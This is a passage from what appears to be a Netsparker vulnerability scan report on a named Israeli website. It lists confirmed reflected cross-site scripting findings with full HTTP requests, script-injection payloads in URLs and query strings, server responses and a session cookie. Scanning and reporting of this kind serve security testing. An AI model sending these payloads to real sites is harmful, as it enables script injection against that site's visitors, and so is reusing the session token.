Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:36 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 179
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/maillingUpdate.asp?'"-->netsparker(0x000218)script>style>
Request
GET /home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00010D)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/home/'"-->netsparker(0x00010D)script>style>
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:59:54 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 184
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/bmidrash/answer.asp'"-->netsparker(0x00037E)script>style>netsparker(0x0001AF)script>style>
3.79. /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015..
Parameters
Parameter Type Value
URI-BASED Full URL '"-->alert(0x000156)
Request
GET /alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:52 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/alon/list.asp'"-->netsparker(0x000156)script>style>
3.81. /about/reg/
CONFIRMED
http://www.shalomlaam.co.il/about/reg/?'"-->alert(0x0004FE)
Parameters
Parameter Type Value
Query Based Query String '"-->alert(0x0004FE)
Request
GET /about/reg/?'"-->netsparker(0x0004FE) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:56 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 171
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/reg/?'"-->netsparker(0x0004FE)script>style>
3.83. /js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea